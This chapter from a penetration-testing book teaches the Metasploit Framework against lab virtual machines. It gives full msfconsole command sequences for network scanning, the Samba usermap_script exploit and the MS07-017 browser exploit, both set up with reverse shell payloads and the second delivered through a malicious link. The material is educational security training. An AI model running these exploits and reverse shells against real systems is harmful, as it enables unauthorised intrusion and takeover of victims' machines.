The Metasploit Framework (MSF) is a solid foundation that you can build on for penetration testing. You can also customize it according to your needs. It is considered by the community of ethical hackers as one of the most complete collections of exploits, and the Kali Linux makers believe that Metasploit is one of the most useful security auditing tools freely available to security professionals. It was first developed by H.D. Moore in 2001 using the Perl language; later, it was completely rewritten in Ruby, and the company Rapid7 acquired it.
Metasploit gives you an awesome working environment. From web vulnerability plugins to network information gathering and from an extensive exploit development environment to commercial-grade exploits, you will hardly find any tool parallel to Metasploit.
Frankly, Metasploit deserves a complete book to cover all its features; keeping that in mind, you’ll find that this single chapter will probably not quench your thirst for knowledge about the tool. Therefore, I encourage you to spend time researching the modules. Since it is free, there are a wide array of helpful articles and forum posts available on the Internet. Moreover, you can get the developer documentation in the metasploit-framework folder. In the next section, I will show you specifically where you can find it.
In this chapter, the victim machine will be running Windows XP, and the attacking machine will be running Kali Linux. At the beginning of this book, I showed you how to install Metasploitable, an intentionally vulnerable Linux virtual machine that can be used to conduct security training. You can also perform your penetration testing techniques on it. You will also need a Windows virtual machine and Internet Explorer to work with some of the exploits covered in this chapter.
Understanding the Metasploit Architecture
Understanding the Metasploit architecture is not difficult. You can take a look at the file system to get a feel for what lies inside. In Kali Linux, Metasploit is provided in the /usr/share/metasploit-framework directory.
Here’s some output where you can take a look at the main Metasploit folder:
//code and output of metasploit-framework
root@kali:~# cd /usr/share/metasploit-framework/
root@kali:/usr/share/metasploit-framework# ls
app Gemfile msfconsole msfupdate scripts
config Gemfile.lock msfd msfvenom tools
data lib msfdb plugins vendor
db metasploit-framework.gemspec msfrpc Rakefile
documentation modules msfrpcd ruby
In the output on the screen (not shown here), you will find two colors: blue and green. Things like msfconsole are in green. This means it is an executable. Things like data, lib, modules, and a few others are in blue; they are folders. When you click Metasploit in your Applications list, msfconsole is executed, and a new terminal opens. Most of the things you do in Metasploit are done in this terminal. The folder lib contains libraries.
Metasploit
libraries are especially important. These libraries allow you to run the exploits, and you do not need to write additional code for simple tasks such as HTTP requests.
// code and output of metasploit-framework library
root@kali:/usr/share/metasploit-framework# cd lib/
root@kali:/usr/share/metasploit-framework/lib# ls
anemone metasploit postgres rbmysql.rb snmp telephony
anemone.rb msf postgres_msf.rb rex snmp.rb telephony.rb
enumerable.rb msfenv.rb rabal rex.rb sqlmap windows_console_color_support.rb
metasm net rbmysql robots.rb tasks
The files ending with .rb are all Ruby files because the Metasploit framework was written in Ruby language.
Understand how things are stored in and related to the Metasploit file system will definitely help you use
msfconsole and the other Metasploit
interfaces. Understanding Metasploit modules is also crucial because almost all the interactions with Metasploit happen through these modules. You can find modules in two places. The primary one is in
/usr/share/metasploit-framework/modules/.
// code and output of metasploit-framework modules
root@kali:/usr/share/metasploit-framework# cd modules/
root@kali:/usr/share/metasploit-framework/modules# ls
auxiliary encoders exploits nops payloads post
Penetration testers store their custom modules under the home directory.
//code
root@kali:cd ~/msf4
root@kali:/ls
history local logos logs modules plugins
All Metasploit modules are organized into separate directories, where
exploit modules are defined as modules that use payloads.
Payloads
consist of code that runs remotely; the nops keep the payload sizes consistent across exploit attempts. You will learn about them in the next section.
// code and output of metasploit-framework exploits
root@kali:~# ls /usr/share/metasploit-framework/modules/exploits/
aix bsdi firefox irix multi solaris
android dialup freebsd linux netware unix
apple_ios example.rb hpux mainframe osx windows
There are different types of exploits inside, such as apple_ios, windows, and more. If you go inside windows, you will find lots of stuff there including antivirus, backdoor, firewall, mysql, mssql, and many more. If you want to look further, you can go inside mysql, ftp, or browser, and you will find a bunch of Ruby files. They are actual modules written in Ruby, and they work in the background.
Auxiliary modules include port scanners, fuzzers, sniffers, and more. In most cases, you will use
scanners. This is explained in the next section.
// code and output of metasploit-framework auxiliary part of modules
root@kali:~# ls /usr/share/metasploit-framework/modules/auxiliary/
admin client dos gather scanner spoof vsploit
analyze crawler example.rb parser server sqli
bnat docx fuzzers pdf sniffer voip
Payloads, Encoders, Nops
Summarizing Modules
Metasploit can present multifaceted interfaces, mainly msfconsole, to the background modules that control exploitation. The console interface is much faster because it presents the attack commands.
You can either start it from the Kali Linux terminal or pick it up from the Applications menu.
Let’s first start Metasploit and create a workspace. In this
workspace, you will test Metasploit.
// code and output of metasploit-framework workspace
msf > workspace
* default
msf > workspace -a sanjib
[*] added workspace sanjib
msf > workspace -h
Usage:
workspace List workspaces
workspace -v List workspaces verbosely
workspace [name] Switch workspace
workspace -a [name] ... Add workspace(s)
workspace -d [name] ... Delete workspace(s)
workspace -D Delete all workspaces
workspace -r <old><new> Rename workspace
workspace -h Show this help information
msf > workspace sanjib
[*] Workspace: sanjib
msf >
Let’s look at the previous code. The first command shows one thing. There is a default workspace, which is defined as default. You can get some help by running the help command (-h). Now the time has come to enter the newly created workspace: sanjib. Now, you can start working inside it. You will work on it in the next sections. Before getting your hands dirty with actual work, you will get a quick overview of the functions that Metasploit modules have.
The modules have a few specific functions. Let’s consider the payload first. After a successful exploitation, the payload starts working. These are fragments of malicious code that implement necessary commands to get work done. You will see examples in the coming sections. Penetration testers target specific vulnerabilities first, and after that, payloads start working. The modules’ exploits work here. Active exploits will exploit a specific target, run until completed, and then exit. Passive exploits wait for incoming hosts such as FTP clients or web browsers and then exploit them.
There is another important set of modules, called auxiliary
modules
. They do not directly establish a connection between a penetration tester and the target system. However, they perform a few handfuls of necessary actions such as scanning, fuzzing, or sniffing that support the exploit modules.
You also need to know about the Encoders module
. The situation arises when an exploit module must bypass antivirus defenses. Encoders help to encode the payload so that it cannot be detected. There are also other modules that are known as Post modules; they start working after a successful attack, and they run on compromised targets to gather useful data and pivot the attacker deeper into the target network.
Finally, there are no operations modules; they are known as nops. You will find them in file systems. During attacks, these modules facilitate buffer overflows.
Now that you know some of the basic modules of Metasploit, you can see Metasploit in action.
Type this
command:
// code and output of using nmap in metasploit-framework
msf > nmap -sV 192.168.2.2
Here goes the output as Metasploit has started working on your Kali Linux terminal.
//output
[*] exec: nmap -sV 192.168.2.2
Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-05 06:18 IST
Nmap scan report for 192.168.2.2
Host is up (0.000093s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: SS-H81M-S1
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.99 seconds
msf >
This performs simple Nmap scanning on the host machine’s IP address. Several applications were identified in the previous output. As a penetration tester, you can investigate any of them for any known vulnerabilities. You can start with Metasploit’s own collection of exploits.
You can start the search for
exploits on the
samba server using this command:
//code of using "search" in Metasploit
msf> search samba
This will give you tons of exploits. You just need to pick the best ones.
//the output of search
exploit/multi/samba/usermap_script
exploit/unix/misc/distcc_exec 2002-02-01 excellent DistCC Daemon Command Execution
exploit/unix/webapp/citrix_access_gateway_exec 2010-12-21 excellent Citrix Access Gateway Command Exe
Here you will use
exploit/multi/samba/usermap_script because it is ranked as excellent. Issuing this command will give you more output where you can get more information about this
exploit.
//code of using "info"
msf > info exploit/multi/samba/usermap_script
//output
Name: Samba "username map script" Command Execution
Module: exploit/multi/samba/usermap_script
Platform: Unix
Arch: cmd
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2007-05-14
Available targets:
Id Name
-- ----
0 Automatic
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 139 yes The target port (TCP)
Payload information:
Space: 1024
Description:
This module exploits a command execution vulnerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username containing shell metacharacters, attackers can execute arbitrary commands. No authentication is needed to exploit this vulnerability since this option is used to map usernames prior to authentication!
References:
https://cvedetails.com/cve/CVE-2007-2447/
OSVDB (34700)
http://www.securityfocus.com/bid/23972
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
http://samba.org/samba/security/CVE-2007-2447.html
If you are interested in reading more, the information page gives you a few good links. When you are starting your career as a security professional, it is good to visit as many web sites as possible where ethical hackers post their articles.
Here, you need to set the target machine’s IP address by using RHOST, and the port will be RPORT. After that, you can proceed to the exploit.
From the preceding output, you can get some details that can help you to move forward.
The next lines of code give you an idea of how you are going to use that exploit against the
host machine’s IP address:
//code of using the exploit
msf > use exploit/multi/samba/usermap_script
msf exploit(multi/samba/usermap_script) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(multi/samba/usermap_script) > set RHOST xxx.xxx.x.x
RHOST => 192.168.2.2
msf exploit(multi/samba/usermap_script) > set RPORT 139
RPORT => 139
msf exploit(multi/samba/usermap_script) > set LHOST xx.x.x.xx
LHOST => 10.0.2.15
msf exploit(multi/samba/usermap_script) > exploit
You should not choose any live system as the remote host (RHOST)
unless you are asked because that is the system being attacked. The local host (LHOST)
is the system used to launch the attack. So, be careful about using Metasploit. You must know what you are doing.
Just type one command after another and see what output you get in your virtual Kali Linux Metasploit terminal. For the remote host, I have chosen my host machine’s IP address, and for the local host, I have chosen my virtual machine’s IP address; just replace these with your own.
You can do another thing to test that your virtual machines are communicating with each other and your network configuration is working. This is important so that in the future you can just scan your whole network and see what types of machines are running in your network.
Let’s open Kali Linux and Windows XP in a virtual machine and type the command to
ping the Windows virtual machine’s IP address as shown here:
//pinging guest Windows IP
ping xx.x.x.xx
PING xx.x.x.xx (xx.x.x.xx) 56(84) bytes of data.
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.024ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.029ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.020ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.030ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.028ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.035ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.022ms
64 bytes from xx.x.x.xx icmp_seq=1 ttl=64 time=0.030ms
^C
... xx.x.x.xx ping statistics ...
8 packets transmitting, 8 received, 0% loss, time 204ms
At the same time, in your virtual Windows XP machine, ping the Kali Linux IP address to see the result.
You can change the Kali Linux IP address with this command:
//changing IP of Kali Linux
ifconfig eth0 xx.x.x.xx
Now you can try pinging from Windows again and see the results.
Just to get more of a feel for using msfconsole, you can again scan your network to see what machines are open currently. Before starting the scan, just type ? in your msfconsole and see the results. You can also issue a single command such as hosts
to see what you get. If you have not started the Nmap scanning, the hosts table will show up as empty. Once the scanning is over, it will be filled up.
Mixins and Plugins in Ruby
Before discussing Metasploit more, let’s try to understand what Ruby is because all modules in the Metasploit framework are written in Ruby classes. This section is a brief overview of Ruby.
Ruby is a dynamic, object-oriented, interpreted, general-purpose programming language. Modules inherit their attributes and methods from type-specific classes, and there is a shared common application programming interface (API) between the modules. An API is a set of functions and procedures that allow you to create applications. These applications can then access the features or data of an operating system, application, or other services. Payloads are slightly different. They are created at runtime from various components. Another interesting facet of these classes in Ruby is they all have one parent class.
A little bit of object-oriented programming knowledge will help you understand another important thing. Modules in Metasploit can add new methods, and they can also overload methods.
You will find another term quite frequently used in Metasploit: mixins. These are a great feature in Ruby. The term comes from the fact that they “get mixed in.” In other words, they include one class into another. This is slightly different from the concept of inheritance that is used in other object-oriented programming languages; however, it has some similarities. For now, you should note a few important things. For mixins, modules can override classes, and they also can add new features, such as protocol-specific or behavior-specific such as brute force. The connect method is implemented by a TCP mixin, and then it is overloaded by other network protocols. There is a scanner mixin that overloads the run method.
On the other hand, plugins work directly with the API. They manipulate the overall framework and hook into the event system. Because of that, plugins easily automate tasks that would be tedious if you wanted to do them manually. By the way, plugins work only in msfconsole. With the help of plugins, you can add new console commands to extend the framework functionality as a whole.
Just like Python, Ruby is a simpler language to learn than C++; so, you should try to learn the few. This will assist you to understand Metasploit better.
Finally, you may ask, why instead of using Python or C++ did the Metasploit makers choose Ruby? After all, Ruby is not a popular choice in security programming.
Well, it’s better to listen to the makers of Metasploit. In the documentation, they have put their feeling into words this way:
“The Python programming language was also a language candidate. The reason the Metasploit staff opted for Ruby instead of Python was for a few different reasons. The primary reason is a general distaste for some of the syntactical annoyances forced by Python, such as block indention. While many would argue the benefits of such an approach, some members of the Metasploit staff find it to be an unnecessary restriction. Other issues with Python center around limitations in parent class method calling and backward compatibility of interpreters.”
As a Python lover, you may disagree with this argument, but that should not stop you from using Metasploit; after all, it is one of the best ethical hacking tools available. Metasploit’s capabilities are staggering, especially with the open extensions through plugins and modules. It is not only powerful but versatile.
Metasploit Console or Interface
The command-line interface to the Metasploit Framework is extremely powerful. This interface is what opens when you open Metasploit Framework from the Kali Linux Application toolbar.
Let’s open the Metasploit console and issue the ? command
.
You will get a long listing, and explaining all the output is beyond the scope of this book. I’m sure you are eager to see only the database back-end commands. Here is the output:
//output "?" command
Database Backend Commands
=========================
Command Description
------- -----------
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
Now you can check the
database status. Issue the following command on your terminal:
//code of database status
msf > db_status
[*] postgresql connected to msf
msf >
The output shows that PostgreSQL is connected to Metasploit.
Now you are ready to move further, so you will want to use the db_nmap command
to see whether there are any vulnerable machines. This time I am going to use the db_nmap command via VMware Player on a Windows 7 host machine. I have also opened virtual Kali Linux, and I have opened virtual Windows XP.
The
db_nmap command says clearly what it is going to do.
//description of using db_nmap
db_nmap Executes nmap and records the output automatically
It will execute an Nmap scan, and it will also record the output automatically. You have already learned about Nmap. As far as versatility is concerned, it is almost equal to Metasploit. So, the combination of Nmap and Metasploit could be deadly for any target machine.
Issue the following command to check the status of all 255
hosts in the network:
//code of using db_nmap
db_nmap -A 10.0.2.0/24 --vv
This code will execute the
nmap command
, and it will also keep a record of the output. The output is fairly long, so I won’t list it all here, but these lines seem interesting:
//part outputs
[*] Nmap: Nmap scan report for 192.168.139.1
[*] Nmap: Host is up, received arp-response (0.00021s latency).
[*] Nmap: Scanned at 2018-06-06 19:55:30 EDT for 137s
[*] Nmap: Not shown: 988 closed ports
[*] Nmap: Reason: 988 resets
[*] Nmap: PORT STATE SERVICE REASON VERSION
[*] Nmap: 135/tcp open msrpc syn-ack ttl 128 Microsoft Windows RPC
[*] Nmap: 139/tcp open netbios-ssn syn-ack ttl 128 Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp open microsoft-ds syn-ack ttl 128 Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 902/tcp open ssl/vmware-auth syn-ack ttl 128 VMware Authentication Daemon 1.10 (Uses VNC, SOAP)
[*] Nmap: 912/tcp open vmware-auth syn-ack ttl 128 VMware Authentication Daemon 1.0 (Uses VNC, SOAP)
[*] Nmap: 1947/tcp open http syn-ack ttl 128 Aladdin/SafeNet HASP license manager 12.49
This is my host machine, which is Windows 7. It seems like it is not protected because the ports are open. I have kept it like that to give you an example what happens in the majority of cases. You can keep the firewall on, but that does not stop the combination of Nmap and Metasploit from exploiting such machines.
You can get more details such as the username, MAC address, and more using the following
commands (00:50:56:c0:00:08 for Windows 7 and 00:50:56:FB:98:F8 for Windows XP):
// more output of using db_nmap
[*] Nmap: | Names:
[*] Nmap: | SS-PC<00> Flags: <unique><active>
[*] Nmap: | WORKGROUP<00> Flags: <group><active>
[*] Nmap: | SS-PC<20> Flags: <unique><active>
[*] Nmap: | WORKGROUP<1e> Flags: <group><active>
[*] Nmap: | WORKGROUP<1d> Flags: <unique><active>
[*] Nmap: | x01x02__MSBROWSE__x02<01> Flags: <group><active>
At the end of the output, you get these lines:
//the end output
[*] Nmap: Completed NSE at 19:57, 0.00s elapsed
[*] Nmap: Read data files from: /usr/bin/../share/nmap
[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 256 IP addresses (4 hosts up) scanned in 143.53 seconds
[*] Nmap: Raw packets sent: 5671 (251.038KB) | Rcvd: 4073 (169.906KB)
Now the time has come to finally issue the
hosts command
to see what you get. The
hosts command will give you a list of all hosts in the database.
//output of using "hosts" command
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
------- --- ---- ------- --------- ----- ------- ---- --------
192.168.139.1 00:50:56:c0:00:08 Windows 7 client
192.168.139.2 00:50:56:f8:ef:30 Player device
192.168.139.137
192.168.139.254 00:50:56:FB:98:F8 Windows XP SP2
msf >
The last one that was also captured in the scanning process is the virtual Windows XP machine. So now you have not only the IP address but also the MAC address and the service pack that is being used. These facts are extremely useful for attacking the target machine.
Exploits and Payloads in Metasploit
Metasploit is all about exploitation. Quite naturally the most desirable command-line term is show exploits. It gives you a long listing of all the exploits contained in the Metasploit Framework. You’ll come back to this in the next section.
There are two types of exploits: active and passive. In
active exploits
, module execution stops when an error occurs. By just passing the -j command
, you can force an active module in the background.
In
passive exploits
, the exploit almost always focuses on the client side such as web browsers or FTP clients. Passing the -i command
can make passive exploits interact with the shell. Another advantage of passive exploits is they can be used in conjunction with e-mail exploits. In Metasploit, after a successful exploitation, a payload will start working. As I said earlier, payloads are nothing but fragments of malicious code, and the payloads actually implement necessary commands to get the after-exploitation work done.
Penetration testers usually set a specific target, and then the active exploits start running. A passive exploit would wait for incoming hosts, such as web browsers, to connect. Once they got hold of them, they start exploiting them.
How to Use Exploit and Payloads
There are thousands of exploits and hundreds of payloads available in Metasploit. What type of exploitation do you want to do? You can target the guest Windows XP machine and expose its vulnerabilities.
Open the Metasploit Framework, and you will be greeted with how many exploits there are to use.
//the total exploits and payloads
+ -- --=[ 1722 exploits - 986 auxiliary - 300 post ]
+ -- --=[ 507 payloads - 40 encoders - 10 nops
After that, you will issue the
show exploits command
and can check the output. Next, you can check out the other options available.
//code of showing exploits
msf > show exploits
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/local/ibstat_path 2013-09-24 excellent ibstat $PATH Privilege Escalation
aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
android/adb/adb_server_exec 2016-01-01 excellent Android ADB Debug Server Remote Payload Execution
android/browser/samsung_knox_smdm_url 2014-11-12 excellent Samsung Galaxy KNOX Android Browser RCE
android/browser/stagefright_mp4_tx3g_64bit 2015-08-13 normal Android Stagefright MP4 tx3g Integer Overflow
android/browser/webview_addjavascriptinterface 2012-12-21 excellent Android Browser and WebView addJavascriptInterface Code Execution
android/fileformat/adobe_reader_pdf_js_interface 2014-04-13 good Adobe Reader for Android addJavascriptInterface Exploit
android/local/futex_requeue 2014-05-03 excellent Android 'Towelroot' Futex Requeue Kernel Exploit
android/local/put_user_vroot 2013-09-06 excellent Android get_user/put_user Exploit
apple_ios/browser/safari_libtiff 2006-08-01 good Apple iOS MobileSafari LibTIFF Buffer Overflow
apple_ios/email/mobilemail_libtiff 2006-08-01 good Apple iOS MobileMail LibTIFF Buffer Overflow
apple_ios/ssh/cydia_default_ssh 2007-07-02 excellent Apple iOS Default SSH Password Vulnerability
....
This is a long list. For brevity, I have cut it short here. For a Windows-specific exploitation, you can also use the
search command. You can search anything in Metasploit.
//using search
msf > search dcom
dcom (Distributed Component Object Model)
is a set of Microsoft program interfaces that help you send requests to other computers over the network. It comes with Windows OS. So, you need to search it using
msf
.
// output of dcom
msf > search dcom
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/telnet/telnet_ruggedcom normal RuggedCom Telnet Password Generator
exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great MS03-026 Microsoft RPC DCOM Interface Overflow
exploit/windows/smb/ms04_031_netdde 2004-10-12 good MS04-031 Microsoft NetDDE Service Overflow
exploit/windows/smb/psexec_psh 1999-01-01 manual Microsoft Windows Authenticated Powershell Command Execution
This will give you a specific listing of exploits. Using this type of exploitation, you can generate a password and do many more things.
You can search the Windows Server–related API and find out how you can exploit the
vulnerable corruptions.
//searching netapi
msf > search netapi
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/smb/ms03_049_netapi 2003-11-11 good MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
exploit/windows/smb/ms06_040_netapi 2006-08-08 good MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
exploit/windows/smb/ms06_070_wkssvc 2006-11-14 manual MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
exploit/windows/smb/ms08_067_netapi 2008-10-28 great MS08-067 Microsoft Server Service Relative Path Stack Corruption
You can also use the
adduser payloads to exploit the vulnerable Windows
XP, and you can attack any Windows XP machine by adding users to it.
//searching adduser
msf > search adduser
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
payload/cmd/windows/adduser normal Windows Execute net user /ADD CMD
payload/linux/armle/adduser normal Linux Add User
payload/linux/x86/adduser normal Linux Add User
payload/windows/adduser normal Windows Execute net user /ADD
The first step is to use the exploit, and then you add the necessary payload to start the exploitation. Therefore, you can similarly use the
show payloads command
to see what type of payloads there are.
//code and output of showing payloads
msf > show payloads
Name Disclosure Date Rank Description
---- --------------- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline
aix/ppc/shell_interact normal AIX execve Shell for inetd
aix/ppc/shell_reverse_tcp normal AIX Command Shell, Reverse TCP Inline
android/meterpreter/reverse_http normal Android Meterpreter, Android Reverse HTTP Stager
android/meterpreter/reverse_https normal Android Meterpreter, Android Reverse HTTPS Stager
android/meterpreter/reverse_tcp normal Android Meterpreter, Android Reverse TCP Stager
android/meterpreter_reverse_http normal Android Meterpreter Shell, Reverse HTTP Inline
android/meterpreter_reverse_https normal Android Meterpreter Shell, Reverse HTTPS Inline
android/meterpreter_reverse_tcp normal Android Meterpreter Shell, Reverse TCP Inline
...
I have cut the output short here, as this is very long.
How to Start Exploits
Starting exploits is fairly simple if you know the technique. Here I will show how to exploit my guest Windows XP machine and create a directory there using the Metasploit Framework in Kali Linux. This can be done by searching for the necessary exploits first.
//code of searching specific exploit
msf > search chunksize
The
chunksize part is an
msf module
that opens many types of Windows vulnerabilities. The previous command will give you a few lines of output, as shown here:
//the search result
windows/browser/ms07_017_ani_loadimage_chunksize 2007-03-28 great Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (HTTP)
windows/browser/ms08_041_snapshotviewer 2008-07-07 excellent Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download
windows/browser/ms08_053_mediaencoder 2008-09-09 normal Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow
windows/browser/ms08_070_visual_studio_msmask 2008-08-13 normal Microsoft Visual Studio Mdmask32.ocx ActiveX Buffer Overflow
Through the first one, you can access any Windows XP machine and add a new directory in the targeted machine. It is done with the HTTP protocol. All you need to do is start your local server in Kali Linux first. Next, from the Windows XP machine’s Internet Explorer browser, you will access that IP address. Crackers use the same method by sending e-mails where these links are given. When users click the link, their machine is compromised.
Your first step will be use that exploit.
//code of using exploit
msf > use exploit/windows/browser/ms07_017_ani_loadimage_chunksize
Next you will try the
show options command
to see what options are available for you.
//code of showing options for that exploit
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use.
Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) >
The table with two columns is extremely important here. The first column is
Current Setting, and the second one is
Required. You can also see the targets by using the command
show targets
.
//code and output of showing targets
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show targets
Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
1 IE6 on Windows NT, 2000, XP, 2003 (all languages)
2 IE7 on Windows XP SP2, 2003 SP1, SP2 (all languages)
3 IE7 and Firefox on Windows Vista (all languages)
4 Firefox on Windows XP (English)
5 Firefox on Windows 2003 (English)
From this output, you can see what types of browsers are vulnerable and what types of Windows machines are undefended. There are a few versions of Internet Explorer and Firefox too.
Now that you have seen the options, next you will use the necessary payloads. Before that, you will ask Metasploit to show all concerned
payloads that are necessary for doing the exploit.
//code of showing payloads
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show payloads
Compatible Payloads
===================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
generic/custom normal Custom Payload
generic/debug_trap normal Generic x86 Debug Trap
generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline
generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline
generic/tight_loop normal Generic x86 Tight Loop
windows/dllinject/bind_hidden_ipknock_tcp normal Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
windows/dllinject/bind_hidden_tcp normal Reflective DLL Injection, Hidden Bind TCP Stager
windows/dllinject/bind_ipv6_tcp normal Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
windows/dllinject/bind_ipv6_tcp_uuid normal Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
windows/dllinject/bind_nonx_tcp normal Reflective DLL Injection, Bind TCP Stager
This is a table here. It shows all the payloads that you can use for exploitation.
You have already used the exploit and seen the options and targets; now you will use the payloads this way.
//code of setting payload
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
Again, you can use show options and see what options are available for you. For that reason, I have issued the show options command
.
Now, let’s look at the output in detail. This is important because you need to know what settings are required and what settings are not required.
//output of showing options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use.
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: ", seh, thread, process, none)
LHOST yes The listen address
LPORT 4444 yes The listen port
Id Name
-- ----
0 (Automatic) IE6, IE7, and Firefox on Windows NT, 2000, XP, 2003 and Vista
There is another table in the terminal, and you can see what current settings are required. Everything is settled, except the LHOST or localhost part. Even the exploitation target has been given by Metasploit: “(Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista.”
You need to set
LHOST
to Metasploit by issuing the necessary command and again issue the
show options command
to see that everything has been settled properly.
//code of setting localhost and showing options
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > set LHOST 10.0.2.15
LHOST => 10.0.2.15
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > show options
I have checked my Kali Linux IP address and set the
localhost so that the targeted machine will open the IP address in the browser and get compromised. The output gives you the feedback that everything is okay.
//output of show-options
Module options (exploit/windows/browser/ms07_017_ani_loadimage_chunksize):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The daemon port to listen on
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use.
Payload options (windows/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: ", seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address
LPORT 4444 yes The listen port
Id Name
-- ----
0 (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista
Now that
LHOST is
set, you can safely issue the final command
exploit.
//code and output of final exploit command
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > exploit
[*] Exploit running as background job 0.
[*] Started reverse TCP handler on 10.0.2.15:4444
msf exploit(windows/browser/ms07_017_ani_loadimage_chunksize) > [*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://10.0.2.15:80/
[*] Server started.
As the guest Kali Linux server starts, any Windows NT, 2000, XP, 2003, and Vista version will be compromised if they open the IE browser and type 10.0.2.15.
This is partly a spoofing technique, where targeted machines are asked to click a malicious link. Now, as a penetration tester, you are in a position to show your clients why they should immediately upgrade old versions of Windows.
Unfortunately, in today’s world, many computer still use old Windows versions, which have a lot of vulnerabilities that are evident from the Metasploit exploits covered in this chapter.
